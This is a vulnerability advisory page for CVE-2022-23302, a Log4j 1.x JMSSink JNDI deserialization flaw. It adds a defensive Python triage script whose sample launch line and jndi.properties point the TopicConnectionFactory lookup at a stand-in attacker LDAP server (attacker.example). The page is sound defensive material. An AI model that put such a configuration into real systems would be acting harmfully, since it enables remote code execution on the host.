CVE-2022-23302
Published: 18 January 2022
Summary
CVE-2022-23302 is a high-severity Deserialization of Untrusted Data (CWE-502) vulnerability in the JMSSink component of Apache Log4j 1.x; it also affects downstream products that bundle Log4j 1.x, such as Oracle Business Intelligence. Its CVSS 3.1 base score is 8.8 (High).
Operationally, it is ranked in the top 25.8% of CVEs by EPSS exploit likelihood; it is not currently listed in the CISA KEV catalog.
Deeper analysis
JMSSink, the standalone receiver in Log4j 1.x that reads logging events from a JMS topic, is vulnerable in all versions of Log4j 1.x to deserialization of untrusted data when the attacker has write access to the Log4j configuration or when the configuration references an LDAP service the attacker has access to. The flaw allows an attacker to supply a TopicConnectionFactoryBindingName value that causes JMSSink to perform JNDI lookups, resulting in remote code execution in the same manner as CVE-2021-4104 (the JMSAppender variant). The issue affects only Log4j 1.x deployments that explicitly run JMSSink, which is not the default configuration; Apache Log4j 1.2 reached end of life in August 2015, so no fix will be released for the 1.x line.
An attacker with the ability to modify the logging configuration, or to influence an LDAP server referenced by that configuration, can achieve arbitrary code execution on the host running JMSSink. The vulnerability carries a CVSS 3.1 score of 8.8, reflecting network-accessible exploitation with low attack complexity, low privileges required, no user interaction, and high impact on confidentiality, integrity, and availability.
Advisories from Apache, NetApp, and Oracle state that users should migrate to Log4j 2, which resolves this and numerous other issues present in the 1.x series. The project documentation explicitly notes that Log4j 1.2 is no longer maintained.
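The checks a responder would run against a Log4j 1.x host, as an added example that is not part of this page or of the Apache, NetApp or Oracle advisories: does a jar still ship the JMSSink class, does a JMSSink launch line or the host's jndi.properties point the TopicConnectionFactory lookup at a remote LDAP/RMI server, and can the class be stripped from the jar as an interim control. It assumes the positional argument order of JMSSink.main (tcfBindingName, topicBindingName, username, password, log4j config file), that a JNDI name carrying a URL scheme is dispatched by InitialContext to that scheme's URL context and therefore contacts the server named in the string, and that deleting the class is acceptable when the sink is not used; the jar, command line and properties it scans are constructed sample data.

```python
# Added example, not code from the advisory or the Log4j project.
# Offline triage helper for CVE-2022-23302 on a Log4j 1.x host. Assumptions:
# JMSSink.main() takes <tcfBindingName> <topicBindingName> <user> <password>
# <log4jConfigFile> in that order; a JNDI name with a URL scheme (ldap://,
# rmi://, ...) makes InitialContext.lookup() contact the server in the name;
# removing the JMSSink class from the jar is an acceptable interim control
# when the sink is not used. All inputs below are constructed sample data.
import io
import re
import zipfile
from urllib.parse import urlsplit

JMSSINK_CLASS = "org/apache/log4j/net/JMSSink.class"
JMSSINK_MAIN = "org.apache.log4j.net.JMSSink"
# JNDI URL schemes that make a lookup talk to a remote server.
REMOTE_JNDI_SCHEMES = {"ldap", "ldaps", "rmi", "iiop", "iiopname", "corbaname", "dns"}


def build_sample_jar() -> bytes:
    """Constructed stand-in for log4j-1.2.x.jar: entry names are real, bodies are not."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("org/apache/log4j/Logger.class", b"\xca\xfe\xba\xbe")
        zf.writestr(JMSSINK_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def jar_entries(jar_bytes: bytes) -> list:
    """Sorted entry names of a jar held in memory."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        return sorted(zf.namelist())


def jar_ships_jmssink(jar_bytes: bytes) -> bool:
    """Check 1: does the jar still contain the JMSSink class?"""
    return JMSSINK_CLASS in jar_entries(jar_bytes)


def strip_class(jar_bytes: bytes, class_path: str = JMSSINK_CLASS) -> bytes:
    """Interim control: copy of the jar without class_path, the same effect as
    `zip -q -d log4j.jar org/apache/log4j/net/JMSSink.class`."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            if info.filename != class_path:
                dst.writestr(info, src.read(info.filename))
    return out.getvalue()


def classify_jndi_name(name: str) -> str:
    """Check 2a: 'remote-url' when the lookup name itself names a server
    (ldap://host/..., rmi://host/...), else 'local-name' (resolved only
    against the provider configured in jndi.properties)."""
    parts = urlsplit(name.strip())
    if parts.scheme.lower() in REMOTE_JNDI_SCHEMES and parts.netloc:
        return "remote-url"
    return "local-name"


def triage_jmssink_cmdline(cmdline: str) -> dict:
    """Check 2b: parse a JMSSink launch line (e.g. from `ps -o args`) and
    classify its TopicConnectionFactoryBindingName argument."""
    tokens = cmdline.split()
    if JMSSINK_MAIN not in tokens:
        return {"jmssink": False}
    args = tokens[tokens.index(JMSSINK_MAIN) + 1:]
    tcf = args[0] if args else ""
    return {
        "jmssink": True,
        "tcf_binding_name": tcf,
        "lookup": classify_jndi_name(tcf),
        "config_file": args[4] if len(args) > 4 else None,
    }


def jndi_provider_hosts(properties_text: str) -> list:
    """Check 2c: a plain lookup name is still resolved by the provider in
    java.naming.provider.url; return (scheme, host) for each such entry."""
    found = []
    for line in properties_text.splitlines():
        line = line.strip()
        if not line or line[0] in "#!":
            continue
        m = re.match(r"java\.naming\.provider\.url\s*[=:]\s*(\S+)", line)
        if m:
            url = urlsplit(m.group(1))
            found.append((url.scheme.lower(), url.hostname))
    return found


# Constructed sample inputs: a sink whose factory lookup is a remote LDAP URL.
SAMPLE_CMDLINE = ("java -cp log4j-1.2.17.jar:jms.jar " + JMSSINK_MAIN +
                  " ldap://attacker.example:1389/TopicConnectionFactory"
                  " jms/LogTopic user secret log4j-sink.properties")
SAMPLE_JNDI_PROPERTIES = (
    "# jndi.properties on the sink host (constructed)\n"
    "java.naming.factory.initial=com.sun.jndi.ldap.LdapCtxFactory\n"
    "java.naming.provider.url=ldap://attacker.example:1389/\n"
)

if __name__ == "__main__":
    jar = build_sample_jar()
    print("JMSSink class present:", jar_ships_jmssink(jar))
    print("Launch line:", triage_jmssink_cmdline(SAMPLE_CMDLINE))
    print("JNDI providers:", jndi_provider_hosts(SAMPLE_JNDI_PROPERTIES))
    print("After strip_class:", jar_ships_jmssink(strip_class(jar)))
```

A "local-name" result is not a clean bill of health on its own: the CVE text also covers a configuration that references an LDAP service the attacker can reach, which is why the provider URL in jndi.properties is checked separately. Stripping the class only helps when nothing on the host needs JMSSink; the advisories' actual fix is migrating off Log4j 1.x.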
EPSS for the CVE rose from a low baseline to a peak of 0.0763 on 2025-01-22 before receding to the current value of 0.0078. EPSS is a modelled probability of exploitation in the next 30 days rather than a record of observed attacks; the peak came three years after the January 2022 disclosure, and the score has since fallen back toward its baseline range.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2022-0721
Vulnerability details
JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration or if the configuration references an LDAP service the attacker has access to. The attacker can provide a TopicConnectionFactoryBindingName configuration causing JMSSink to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-4104. Note this issue only affects Log4j 1.x when specifically configured to use JMSSink, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
- CWE(s): CWE-502 Deserialization of Untrusted Data
Related Threats
No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.
Affected Assets
- Apache Log4j 1.x (all versions) where JMSSink is run, and products that bundle Log4j 1.x, such as Oracle Business Intelligence
Mitigating Controls
Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness type (CWE-502) cited in the NVD entry. For this CVE specifically, the controls that matter are the ones in the advisories above: do not run JMSSink, and migrate off Log4j 1.x.
- Penetration testing that supplies malicious serialized objects detects unsafe deserialization and drives corrective action.
- Deserialization testing of untrusted-data handling reveals unsafe processing, which the remediation process then addresses.
- Sandboxing: untrusted serialized data is deserialized and observed inside an isolated environment, so gadget-chain execution cannot reach the host outside the sandbox.
- Input validation that accepts or rejects untrusted serialized data before deserialization occurs.
- Malicious-code detection that identifies and blocks code introduced through deserialization of untrusted data at system boundaries.
- Integrity verification of serialized data that detects tampering before deserialization occurs.
- Data provenance tracking that identifies untrusted sources before deserialization or processing occurs.